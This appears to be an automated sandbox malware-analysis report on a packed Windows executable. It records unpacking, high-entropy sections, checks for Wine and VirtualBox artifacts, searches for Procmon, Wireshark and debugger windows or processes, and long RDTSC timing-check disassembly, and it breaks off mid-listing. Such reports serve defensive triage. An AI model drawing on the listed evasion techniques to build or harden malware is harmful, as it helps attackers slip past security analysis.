Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D529FF
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Yda6AxtlVP.exeReversingLabs: Detection: 65%
Source: Yda6AxtlVP.exeVirustotal: Detection: 65%
Source: Yda6AxtlVP.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Yda6AxtlVP.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Yda6AxtlVP.exeStatic file information: File size 4534272 > 1048576
Source: Yda6AxtlVP.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x28a000
Source: Yda6AxtlVP.exeStatic PE information: Raw size of agnlrrtx is bigger than: 0x100000 < 0x1c5400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeUnpacked PE file: 0.2.Yda6AxtlVP.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agnlrrtx:EW;dgeihioi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agnlrrtx:EW;dgeihioi:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: Yda6AxtlVP.exeStatic PE information: real checksum: 0x454b48 should be: 0x45d9bf
Source: Yda6AxtlVP.exeStatic PE information: section name:
Source: Yda6AxtlVP.exeStatic PE information: section name: .idata
Source: Yda6AxtlVP.exeStatic PE information: section name:
Source: Yda6AxtlVP.exeStatic PE information: section name: agnlrrtx
Source: Yda6AxtlVP.exeStatic PE information: section name: dgeihioi
Source: Yda6AxtlVP.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85DDA push ds; iretd 0_3_01D85E51
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85DDA push ds; iretd 0_3_01D85E51
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85BFA push esi; iretd 0_3_01D85C11
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85BFA push esi; iretd 0_3_01D85C11
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D82745 push es; iretd 0_3_01D8274A
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D82745 push es; iretd 0_3_01D8274A
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85C12 push ecx; iretd 0_3_01D85C29
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85C12 push ecx; iretd 0_3_01D85C29
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D87A12 pushfd ; retf 0_3_01D87A41
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D87A12 pushfd ; retf 0_3_01D87A41
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85DDA push ds; iretd 0_3_01D85E51
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85DDA push ds; iretd 0_3_01D85E51
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85BFA push esi; iretd 0_3_01D85C11
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85BFA push esi; iretd 0_3_01D85C11
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D82745 push es; iretd 0_3_01D8274A
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D82745 push es; iretd 0_3_01D8274A
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85C12 push ecx; iretd 0_3_01D85C29
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D85C12 push ecx; iretd 0_3_01D85C29
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D87A12 pushfd ; retf 0_3_01D87A41
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_3_01D87A12 pushfd ; retf 0_3_01D87A41
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_010D41D0 push eax; mov dword ptr [esp], edx0_2_010D41D5
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DD2340 push eax; mov dword ptr [esp], 00000000h0_2_00DD2343
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00E0C7F0 push eax; mov dword ptr [esp], 00000000h0_2_00E0C743
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D90AC0 push eax; mov dword ptr [esp], 00000000h0_2_00D90AC4
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DB1430 push eax; mov dword ptr [esp], 00000000h0_2_00DB1433
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DD39A0 push eax; mov dword ptr [esp], 00000000h0_2_00DD39A3
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00DADAD0 push eax; mov dword ptr [esp], edx0_2_00DADAD1
Source: Yda6AxtlVP.exeStatic PE information: section name: agnlrrtx entropy: 7.955768774106295

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15E803E second address: 15E8090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665249A06h 0x00000009 popad 0x0000000a jmp 00007F9665249A03h 0x0000000f jmp 00007F96652499FDh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9665249A04h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1601061 second address: 1601065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16044D4 second address: 16044DE instructions: 0x00000000 rdtsc 0x00000002 je 00007F96652499FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1604615 second address: 160461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 160467D second address: 16046AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F96652499FCh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 nop 0x00000015 jnl 00007F96652499F9h 0x0000001b push 00000000h 0x0000001d push 9063CE38h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16046AD second address: 1604756 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F9665989DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 6F9C3248h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F9665989DA8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 sub ecx, 679F96E7h 0x00000038 push 00000003h 0x0000003a mov dx, A1E1h 0x0000003e push 00000000h 0x00000040 call 00007F9665989DB1h 0x00000045 jmp 00007F9665989DB9h 0x0000004a pop edi 0x0000004b mov dword ptr [ebp+12A029FAh], eax 0x00000051 push 00000003h 0x00000053 and dx, E28Eh 0x00000058 call 00007F9665989DA9h 0x0000005d jmp 00007F9665989DB1h 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 pop eax 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16048A5 second address: 16048AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16048AA second address: 1604936 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F9665989DB1h 0x00000011 jmp 00007F9665989DABh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+12A026CEh], eax 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+12A026D9h], esi 0x00000026 push eax 0x00000027 movzx ecx, dx 0x0000002a pop ecx 0x0000002b push 00000003h 0x0000002d pushad 0x0000002e mov si, ax 0x00000031 mov dword ptr [ebp+12A02818h], edi 0x00000037 popad 0x00000038 call 00007F9665989DA9h 0x0000003d jmp 00007F9665989DB8h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F9665989DB7h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1604936 second address: 1604949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1604949 second address: 160494D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 160494D second address: 1604986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jmp 00007F9665249A09h 0x00000012 pop edx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F96652499FBh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1604986 second address: 160498A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 160498A second address: 16049A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9665249A02h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16049A9 second address: 16049D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DAFh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [ebp+12A0372Fh] 0x00000014 mov edx, ebx 0x00000016 lea ebx, dword ptr [ebp+12B92404h] 0x0000001c cld 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16049D6 second address: 16049E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F96652499FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16245CB second address: 16245D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1622A4A second address: 1622A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1622A50 second address: 1622A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162335A second address: 1623378 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96652499F6h 0x00000008 jno 00007F96652499F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F96652499F6h 0x00000018 ja 00007F96652499F6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1623378 second address: 1623397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16234E5 second address: 16234E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16199D9 second address: 1619A0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9665989DBDh 0x00000008 jmp 00007F9665989DB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9665989DADh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1619A0B second address: 1619A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1619A0F second address: 1619A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1619A15 second address: 1619A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15FC5AA second address: 15FC5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1624157 second address: 162415B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1628B4B second address: 1628B72 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9665989DACh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16272C2 second address: 16272CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16272CB second address: 16272D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1628E0E second address: 1628E35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9665249A07h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F96652499FEh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162B26F second address: 162B2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9665989DA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007F9665989DB4h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F9665989DA6h 0x0000001c jmp 00007F9665989DB4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162B2AE second address: 162B2C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F96652499F6h 0x0000000d pop esi 0x0000000e jl 00007F9665249A02h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162B2C4 second address: 162B2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162C702 second address: 162C711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96652499FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 162C711 second address: 162C716 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16312D9 second address: 16312F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9665249A01h 0x0000000c jmp 00007F96652499FBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 15F72F7 second address: 15F72FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1630762 second address: 1630780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F96652499F6h 0x00000013 jng 00007F96652499F6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1630780 second address: 1630784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1630784 second address: 16307B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F96652499FCh 0x0000000e popad 0x0000000f pushad 0x00000010 jl 00007F96652499FEh 0x00000016 jng 00007F96652499F6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f jbe 00007F96652499F6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 16307B1 second address: 16307C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F9665989DA6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634853 second address: 1634858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634858 second address: 1634880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665989DB5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007F9665989DA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634880 second address: 1634885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 1634938 second address: 1634999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F9665989DB2h 0x0000000e jbe 00007F9665989DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F9665989DB2h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push esi 0x00000024 jno 00007F9665989DACh 0x0000002a pop esi 0x0000002b mov eax, dword ptr [eax] 0x0000002d push esi 0x0000002e push edi 0x0000002f pushad 0x00000030 popad 0x00000031 pop edi 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jbe 00007F9665989DA8h 0x0000003f pushad 0x00000040 